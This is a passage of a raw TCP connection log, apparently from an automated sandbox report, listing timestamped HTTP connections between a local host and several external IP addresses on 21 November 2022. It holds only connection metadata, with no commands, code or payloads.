                                                                                                                                                                                    Nov 21, 2022 19:24:05.931607008 CET8049892192.185.32.157192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:05.931660891 CET8049892192.185.32.157192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:05.931714058 CET8049892192.185.32.157192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:05.931766033 CET8049892192.185.32.157192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:05.931818008 CET8049892192.185.32.157192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:05.931870937 CET8049892192.185.32.157192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:05.931881905 CET4989280192.168.11.20192.185.32.157
                                                                                                                                                                                    Nov 21, 2022 19:24:05.931924105 CET8049892192.185.32.157192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:05.931978941 CET8049892192.185.32.157192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:05.932034016 CET4989280192.168.11.20192.185.32.157
                                                                                                                                                                                    Nov 21, 2022 19:24:05.932205915 CET4989280192.168.11.20192.185.32.157
                                                                                                                                                                                    Nov 21, 2022 19:24:06.047044992 CET8049892192.185.32.157192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:06.095174074 CET4989280192.168.11.20192.185.32.157
                                                                                                                                                                                    Nov 21, 2022 19:24:06.423377991 CET4989280192.168.11.20192.185.32.157
                                                                                                                                                                                    Nov 21, 2022 19:24:07.438973904 CET4989380192.168.11.20192.185.32.157
                                                                                                                                                                                    Nov 21, 2022 19:24:07.554474115 CET8049893192.185.32.157192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:07.554795027 CET4989380192.168.11.20192.185.32.157
                                                                                                                                                                                    Nov 21, 2022 19:24:07.554896116 CET4989380192.168.11.20192.185.32.157
                                                                                                                                                                                    Nov 21, 2022 19:24:07.687123060 CET8049893192.185.32.157192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:07.793509960 CET8049893192.185.32.157192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:07.844767094 CET4989380192.168.11.20192.185.32.157
                                                                                                                                                                                    Nov 21, 2022 19:24:17.799375057 CET8049893192.185.32.157192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:17.799717903 CET4989380192.168.11.20192.185.32.157
                                                                                                                                                                                    Nov 21, 2022 19:24:17.799760103 CET4989380192.168.11.20192.185.32.157
                                                                                                                                                                                    Nov 21, 2022 19:24:17.914805889 CET8049893192.185.32.157192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:22.811080933 CET4989480192.168.11.2038.55.15.214
                                                                                                                                                                                    Nov 21, 2022 19:24:22.974412918 CET804989438.55.15.214192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:22.974623919 CET4989480192.168.11.2038.55.15.214
                                                                                                                                                                                    Nov 21, 2022 19:24:22.974842072 CET4989480192.168.11.2038.55.15.214
                                                                                                                                                                                    Nov 21, 2022 19:24:23.137538910 CET804989438.55.15.214192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:23.177141905 CET804989438.55.15.214192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:23.177205086 CET804989438.55.15.214192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:23.177548885 CET4989480192.168.11.2038.55.15.214
                                                                                                                                                                                    Nov 21, 2022 19:24:23.981993914 CET4989480192.168.11.2038.55.15.214
                                                                                                                                                                                    Nov 21, 2022 19:24:24.997558117 CET4989580192.168.11.2038.55.15.214
                                                                                                                                                                                    Nov 21, 2022 19:24:25.160772085 CET804989538.55.15.214192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:25.161156893 CET4989580192.168.11.2038.55.15.214
                                                                                                                                                                                    Nov 21, 2022 19:24:25.161257982 CET4989580192.168.11.2038.55.15.214
                                                                                                                                                                                    Nov 21, 2022 19:24:25.324357033 CET804989538.55.15.214192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:25.361253977 CET804989538.55.15.214192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:25.361313105 CET804989538.55.15.214192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:25.361498117 CET4989580192.168.11.2038.55.15.214
                                                                                                                                                                                    Nov 21, 2022 19:24:26.169008970 CET4989580192.168.11.2038.55.15.214
                                                                                                                                                                                    Nov 21, 2022 19:24:27.184520960 CET4989680192.168.11.2038.55.15.214
                                                                                                                                                                                    Nov 21, 2022 19:24:27.347165108 CET804989638.55.15.214192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:27.347543955 CET4989680192.168.11.2038.55.15.214
                                                                                                                                                                                    Nov 21, 2022 19:24:27.348279953 CET4989680192.168.11.2038.55.15.214
                                                                                                                                                                                    Nov 21, 2022 19:24:27.348332882 CET4989680192.168.11.2038.55.15.214
                                                                                                                                                                                    Nov 21, 2022 19:24:27.348381042 CET4989680192.168.11.2038.55.15.214
                                                                                                                                                                                    Nov 21, 2022 19:24:27.510974884 CET804989638.55.15.214192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:27.511054993 CET804989638.55.15.214192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:27.511064053 CET804989638.55.15.214192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:27.511173010 CET4989680192.168.11.2038.55.15.214
                                                                                                                                                                                    Nov 21, 2022 19:24:27.511207104 CET804989638.55.15.214192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:27.511255980 CET4989680192.168.11.2038.55.15.214
                                                                                                                                                                                    Nov 21, 2022 19:24:27.511327028 CET804989638.55.15.214192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:27.511596918 CET4989680192.168.11.2038.55.15.214
                                                                                                                                                                                    Nov 21, 2022 19:24:27.673943043 CET804989638.55.15.214192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:27.673954964 CET804989638.55.15.214192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:27.673980951 CET804989638.55.15.214192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:27.674113989 CET4989680192.168.11.2038.55.15.214
                                                                                                                                                                                    Nov 21, 2022 19:24:27.674140930 CET804989638.55.15.214192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:27.674151897 CET804989638.55.15.214192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:27.674164057 CET4989680192.168.11.2038.55.15.214
                                                                                                                                                                                    Nov 21, 2022 19:24:27.674212933 CET4989680192.168.11.2038.55.15.214
                                                                                                                                                                                    Nov 21, 2022 19:24:27.674215078 CET804989638.55.15.214192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:27.674380064 CET4989680192.168.11.2038.55.15.214
                                                                                                                                                                                    Nov 21, 2022 19:24:27.674438000 CET804989638.55.15.214192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:27.674541950 CET804989638.55.15.214192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:27.674647093 CET804989638.55.15.214192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:27.836815119 CET804989638.55.15.214192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:27.836910963 CET804989638.55.15.214192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:27.836921930 CET804989638.55.15.214192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:27.837021112 CET804989638.55.15.214192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:27.837032080 CET804989638.55.15.214192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:27.837146997 CET804989638.55.15.214192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:27.875634909 CET804989638.55.15.214192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:27.875699043 CET804989638.55.15.214192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:27.876076937 CET4989680192.168.11.2038.55.15.214
                                                                                                                                                                                    Nov 21, 2022 19:24:28.356127977 CET4989680192.168.11.2038.55.15.214
                                                                                                                                                                                    Nov 21, 2022 19:24:29.371767044 CET4989780192.168.11.2038.55.15.214
                                                                                                                                                                                    Nov 21, 2022 19:24:29.537633896 CET804989738.55.15.214192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:29.537897110 CET4989780192.168.11.2038.55.15.214
                                                                                                                                                                                    Nov 21, 2022 19:24:29.537976980 CET4989780192.168.11.2038.55.15.214
                                                                                                                                                                                    Nov 21, 2022 19:24:29.703849077 CET804989738.55.15.214192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:29.707251072 CET804989738.55.15.214192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:29.707350016 CET804989738.55.15.214192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:29.707639933 CET4989780192.168.11.2038.55.15.214
                                                                                                                                                                                    Nov 21, 2022 19:24:29.707704067 CET4989780192.168.11.2038.55.15.214
                                                                                                                                                                                    Nov 21, 2022 19:24:29.873389006 CET804989738.55.15.214192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:34.714644909 CET4989880192.168.11.203.13.90.76
                                                                                                                                                                                    Nov 21, 2022 19:24:34.861243963 CET80498983.13.90.76192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:34.861517906 CET4989880192.168.11.203.13.90.76
                                                                                                                                                                                    Nov 21, 2022 19:24:34.861649036 CET4989880192.168.11.203.13.90.76
                                                                                                                                                                                    Nov 21, 2022 19:24:35.008090019 CET80498983.13.90.76192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:35.008651972 CET80498983.13.90.76192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:35.008724928 CET80498983.13.90.76192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:35.009068012 CET4989880192.168.11.203.13.90.76
                                                                                                                                                                                    Nov 21, 2022 19:24:35.869944096 CET4989880192.168.11.203.13.90.76
                                                                                                                                                                                    Nov 21, 2022 19:24:36.885566950 CET4989980192.168.11.203.13.90.76
                                                                                                                                                                                    Nov 21, 2022 19:24:37.031979084 CET80498993.13.90.76192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:37.032227993 CET4989980192.168.11.203.13.90.76
                                                                                                                                                                                    Nov 21, 2022 19:24:37.032330990 CET4989980192.168.11.203.13.90.76
                                                                                                                                                                                    Nov 21, 2022 19:24:37.179203987 CET80498993.13.90.76192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:37.180026054 CET80498993.13.90.76192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:37.180054903 CET80498993.13.90.76192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:37.180174112 CET4989980192.168.11.203.13.90.76
                                                                                                                                                                                    Nov 21, 2022 19:24:38.041456938 CET4989980192.168.11.203.13.90.76
                                                                                                                                                                                    Nov 21, 2022 19:24:39.057149887 CET4990080192.168.11.203.13.90.76
                                                                                                                                                                                    Nov 21, 2022 19:24:39.203741074 CET80499003.13.90.76192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:39.204082012 CET4990080192.168.11.203.13.90.76
                                                                                                                                                                                    Nov 21, 2022 19:24:39.204737902 CET4990080192.168.11.203.13.90.76
                                                                                                                                                                                    Nov 21, 2022 19:24:39.204828024 CET4990080192.168.11.203.13.90.76
                                                                                                                                                                                    Nov 21, 2022 19:24:39.351491928 CET80499003.13.90.76192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:39.351572990 CET80499003.13.90.76192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:39.351627111 CET80499003.13.90.76192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:39.351684093 CET80499003.13.90.76192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:39.351722956 CET4990080192.168.11.203.13.90.76
                                                                                                                                                                                    Nov 21, 2022 19:24:39.351737022 CET80499003.13.90.76192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:39.351789951 CET80499003.13.90.76192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:39.351834059 CET4990080192.168.11.203.13.90.76
                                                                                                                                                                                    Nov 21, 2022 19:24:39.351844072 CET80499003.13.90.76192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:39.351897955 CET80499003.13.90.76192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:39.351898909 CET4990080192.168.11.203.13.90.76
                                                                                                                                                                                    Nov 21, 2022 19:24:39.351949930 CET80499003.13.90.76192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:39.352000952 CET80499003.13.90.76192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:39.352123022 CET4990080192.168.11.203.13.90.76
                                                                                                                                                                                    Nov 21, 2022 19:24:39.352221966 CET80499003.13.90.76192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:39.352236032 CET4990080192.168.11.203.13.90.76
                                                                                                                                                                                    Nov 21, 2022 19:24:39.352284908 CET80499003.13.90.76192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:39.352511883 CET4990080192.168.11.203.13.90.76
                                                                                                                                                                                    Nov 21, 2022 19:24:39.498717070 CET80499003.13.90.76192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:39.498835087 CET80499003.13.90.76192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:39.498918056 CET80499003.13.90.76192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:39.499001980 CET80499003.13.90.76192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:39.499022961 CET4990080192.168.11.203.13.90.76
                                                                                                                                                                                    Nov 21, 2022 19:24:39.499121904 CET4990080192.168.11.203.13.90.76
                                                                                                                                                                                    Nov 21, 2022 19:24:39.499172926 CET80499003.13.90.76192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:39.499448061 CET80499003.13.90.76192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:39.499499083 CET80499003.13.90.76192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:39.499653101 CET80499003.13.90.76192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:39.499788046 CET80499003.13.90.76192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:39.500080109 CET80499003.13.90.76192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:39.645919085 CET80499003.13.90.76192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:39.646125078 CET80499003.13.90.76192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:39.646369934 CET80499003.13.90.76192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:39.646619081 CET80499003.13.90.76192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:39.646800995 CET80499003.13.90.76192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:39.689809084 CET80499003.13.90.76192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:40.212743044 CET4990080192.168.11.203.13.90.76
                                                                                                                                                                                    Nov 21, 2022 19:24:41.228329897 CET4990180192.168.11.203.13.90.76
                                                                                                                                                                                    Nov 21, 2022 19:24:41.374845028 CET80499013.13.90.76192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:41.375099897 CET4990180192.168.11.203.13.90.76
                                                                                                                                                                                    Nov 21, 2022 19:24:41.375164986 CET4990180192.168.11.203.13.90.76
                                                                                                                                                                                    Nov 21, 2022 19:24:41.521769047 CET80499013.13.90.76192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:41.522042036 CET80499013.13.90.76192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:41.522083998 CET80499013.13.90.76192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:41.522447109 CET4990180192.168.11.203.13.90.76
                                                                                                                                                                                    Nov 21, 2022 19:24:41.522526979 CET4990180192.168.11.203.13.90.76
                                                                                                                                                                                    Nov 21, 2022 19:24:41.669203043 CET80499013.13.90.76192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:46.525032997 CET4990280192.168.11.202.57.90.16
                                                                                                                                                                                    Nov 21, 2022 19:24:46.553941965 CET80499022.57.90.16192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:46.554236889 CET4990280192.168.11.202.57.90.16
                                                                                                                                                                                    Nov 21, 2022 19:24:46.554383993 CET4990280192.168.11.202.57.90.16
                                                                                                                                                                                    Nov 21, 2022 19:24:46.583172083 CET80499022.57.90.16192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:46.583233118 CET80499022.57.90.16192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:46.583278894 CET80499022.57.90.16192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:46.583478928 CET4990280192.168.11.202.57.90.16
                                                                                                                                                                                    Nov 21, 2022 19:24:47.554968119 CET4990280192.168.11.202.57.90.16
                                                                                                                                                                                    Nov 21, 2022 19:24:48.570486069 CET4990380192.168.11.202.57.90.16
                                                                                                                                                                                    Nov 21, 2022 19:24:48.598371983 CET80499032.57.90.16192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:48.598705053 CET4990380192.168.11.202.57.90.16
                                                                                                                                                                                    Nov 21, 2022 19:24:48.598859072 CET4990380192.168.11.202.57.90.16
                                                                                                                                                                                    Nov 21, 2022 19:24:48.626535892 CET80499032.57.90.16192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:48.626638889 CET80499032.57.90.16192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:48.626760960 CET80499032.57.90.16192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:48.626884937 CET4990380192.168.11.202.57.90.16
                                                                                                                                                                                    Nov 21, 2022 19:24:49.601313114 CET4990380192.168.11.202.57.90.16
                                                                                                                                                                                    Nov 21, 2022 19:24:50.617070913 CET4990480192.168.11.202.57.90.16
                                                                                                                                                                                    Nov 21, 2022 19:24:50.645931005 CET80499042.57.90.16192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:50.646147013 CET4990480192.168.11.202.57.90.16
                                                                                                                                                                                    Nov 21, 2022 19:24:50.646812916 CET4990480192.168.11.202.57.90.16
                                                                                                                                                                                    Nov 21, 2022 19:24:50.646903038 CET4990480192.168.11.202.57.90.16
                                                                                                                                                                                    Nov 21, 2022 19:24:50.675602913 CET80499042.57.90.16192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:50.675672054 CET80499042.57.90.16192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:50.675714016 CET80499042.57.90.16192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:50.675820112 CET4990480192.168.11.202.57.90.16
                                                                                                                                                                                    Nov 21, 2022 19:24:50.675894022 CET4990480192.168.11.202.57.90.16
                                                                                                                                                                                    Nov 21, 2022 19:24:50.675944090 CET4990480192.168.11.202.57.90.16
                                                                                                                                                                                    Nov 21, 2022 19:24:50.676022053 CET80499042.57.90.16192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:50.676198959 CET80499042.57.90.16192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:50.676291943 CET4990480192.168.11.202.57.90.16
                                                                                                                                                                                    Nov 21, 2022 19:24:50.676336050 CET80499042.57.90.16192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:50.676459074 CET4990480192.168.11.202.57.90.16
                                                                                                                                                                                    Nov 21, 2022 19:24:50.676625967 CET4990480192.168.11.202.57.90.16
                                                                                                                                                                                    Nov 21, 2022 19:24:50.704648018 CET80499042.57.90.16192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:50.704708099 CET80499042.57.90.16192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:50.704874039 CET4990480192.168.11.202.57.90.16
                                                                                                                                                                                    Nov 21, 2022 19:24:50.704957008 CET4990480192.168.11.202.57.90.16
                                                                                                                                                                                    Nov 21, 2022 19:24:50.705051899 CET80499042.57.90.16192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:50.705106974 CET80499042.57.90.16192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:50.705251932 CET4990480192.168.11.202.57.90.16
                                                                                                                                                                                    Nov 21, 2022 19:24:50.705265045 CET80499042.57.90.16192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:50.705377102 CET80499042.57.90.16192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:50.705442905 CET4990480192.168.11.202.57.90.16
                                                                                                                                                                                    Nov 21, 2022 19:24:50.705657005 CET80499042.57.90.16192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:50.705820084 CET80499042.57.90.16192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:50.733993053 CET80499042.57.90.16192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:50.734055042 CET80499042.57.90.16192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:50.734096050 CET80499042.57.90.16192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:50.734178066 CET80499042.57.90.16192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:50.734500885 CET80499042.57.90.16192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:50.734730959 CET80499042.57.90.16192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:50.734791994 CET80499042.57.90.16192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:50.735121965 CET4990480192.168.11.202.57.90.16
                                                                                                                                                                                    Nov 21, 2022 19:24:51.647679090 CET4990480192.168.11.202.57.90.16
                                                                                                                                                                                    Nov 21, 2022 19:24:52.663568020 CET4990580192.168.11.202.57.90.16
                                                                                                                                                                                    Nov 21, 2022 19:24:52.692562103 CET80499052.57.90.16192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:52.692799091 CET4990580192.168.11.202.57.90.16
                                                                                                                                                                                    Nov 21, 2022 19:24:52.692910910 CET4990580192.168.11.202.57.90.16
                                                                                                                                                                                    Nov 21, 2022 19:24:52.721530914 CET80499052.57.90.16192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:52.721621037 CET80499052.57.90.16192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:52.721633911 CET80499052.57.90.16192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:52.721888065 CET4990580192.168.11.202.57.90.16
                                                                                                                                                                                    Nov 21, 2022 19:24:52.721986055 CET4990580192.168.11.202.57.90.16
                                                                                                                                                                                    Nov 21, 2022 19:24:52.750406027 CET80499052.57.90.16192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:57.725619078 CET4990680192.168.11.20103.63.2.175
                                                                                                                                                                                    Nov 21, 2022 19:24:57.913940907 CET8049906103.63.2.175192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:57.914218903 CET4990680192.168.11.20103.63.2.175
                                                                                                                                                                                    Nov 21, 2022 19:24:57.914343119 CET4990680192.168.11.20103.63.2.175
                                                                                                                                                                                    Nov 21, 2022 19:24:58.103296995 CET8049906103.63.2.175192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:58.103648901 CET8049906103.63.2.175192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:58.103735924 CET8049906103.63.2.175192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:58.103936911 CET4990680192.168.11.20103.63.2.175
                                                                                                                                                                                    Nov 21, 2022 19:24:58.112968922 CET8049906103.63.2.175192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:24:58.113228083 CET4990680192.168.11.20103.63.2.175
                                                                                                                                                                                    Nov 21, 2022 19:24:58.927294016 CET4990680192.168.11.20103.63.2.175
                                                                                                                                                                                    Nov 21, 2022 19:24:59.943125963 CET4990780192.168.11.20103.63.2.175
                                                                                                                                                                                    Nov 21, 2022 19:25:00.118247032 CET8049907103.63.2.175192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:00.118555069 CET4990780192.168.11.20103.63.2.175
                                                                                                                                                                                    Nov 21, 2022 19:25:00.118618965 CET4990780192.168.11.20103.63.2.175
                                                                                                                                                                                    Nov 21, 2022 19:25:00.293752909 CET8049907103.63.2.175192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:00.294034004 CET8049907103.63.2.175192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:00.294106960 CET8049907103.63.2.175192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:00.294259071 CET4990780192.168.11.20103.63.2.175
                                                                                                                                                                                    Nov 21, 2022 19:25:01.130145073 CET4990780192.168.11.20103.63.2.175
                                                                                                                                                                                    Nov 21, 2022 19:25:02.145617008 CET4990880192.168.11.20103.63.2.175
                                                                                                                                                                                    Nov 21, 2022 19:25:02.333803892 CET8049908103.63.2.175192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:02.334122896 CET4990880192.168.11.20103.63.2.175
                                                                                                                                                                                    Nov 21, 2022 19:25:02.334731102 CET4990880192.168.11.20103.63.2.175
                                                                                                                                                                                    Nov 21, 2022 19:25:02.334825993 CET4990880192.168.11.20103.63.2.175
                                                                                                                                                                                    Nov 21, 2022 19:25:02.522945881 CET8049908103.63.2.175192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:02.522973061 CET8049908103.63.2.175192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:02.523142099 CET8049908103.63.2.175192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:02.523273945 CET4990880192.168.11.20103.63.2.175
                                                                                                                                                                                    Nov 21, 2022 19:25:02.523319006 CET4990880192.168.11.20103.63.2.175
                                                                                                                                                                                    Nov 21, 2022 19:25:02.523400068 CET8049908103.63.2.175192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:02.523427010 CET8049908103.63.2.175192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:02.523646116 CET4990880192.168.11.20103.63.2.175
                                                                                                                                                                                    Nov 21, 2022 19:25:02.523755074 CET8049908103.63.2.175192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:02.523781061 CET8049908103.63.2.175192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:02.523804903 CET4990880192.168.11.20103.63.2.175
                                                                                                                                                                                    Nov 21, 2022 19:25:02.524157047 CET4990880192.168.11.20103.63.2.175
                                                                                                                                                                                    Nov 21, 2022 19:25:02.711571932 CET8049908103.63.2.175192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:02.711631060 CET8049908103.63.2.175192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:02.711671114 CET8049908103.63.2.175192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:02.711913109 CET4990880192.168.11.20103.63.2.175
                                                                                                                                                                                    Nov 21, 2022 19:25:02.711949110 CET8049908103.63.2.175192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:02.712023020 CET4990880192.168.11.20103.63.2.175
                                                                                                                                                                                    Nov 21, 2022 19:25:02.712188959 CET8049908103.63.2.175192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:02.712331057 CET8049908103.63.2.175192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:02.712335110 CET4990880192.168.11.20103.63.2.175
                                                                                                                                                                                    Nov 21, 2022 19:25:02.712418079 CET8049908103.63.2.175192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:02.712482929 CET8049908103.63.2.175192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:02.900527000 CET8049908103.63.2.175192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:02.900610924 CET8049908103.63.2.175192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:02.900662899 CET8049908103.63.2.175192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:02.900707960 CET8049908103.63.2.175192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:02.900751114 CET8049908103.63.2.175192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:02.900794029 CET8049908103.63.2.175192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:02.901098013 CET8049908103.63.2.175192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:02.901165962 CET8049908103.63.2.175192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:02.901215076 CET8049908103.63.2.175192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:02.901259899 CET8049908103.63.2.175192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:02.901309013 CET8049908103.63.2.175192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:02.901501894 CET4990880192.168.11.20103.63.2.175
                                                                                                                                                                                    Nov 21, 2022 19:25:03.348444939 CET4990880192.168.11.20103.63.2.175
                                                                                                                                                                                    Nov 21, 2022 19:25:04.364454985 CET4990980192.168.11.20103.63.2.175
                                                                                                                                                                                    Nov 21, 2022 19:25:04.539473057 CET8049909103.63.2.175192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:04.539691925 CET4990980192.168.11.20103.63.2.175
                                                                                                                                                                                    Nov 21, 2022 19:25:04.539756060 CET4990980192.168.11.20103.63.2.175
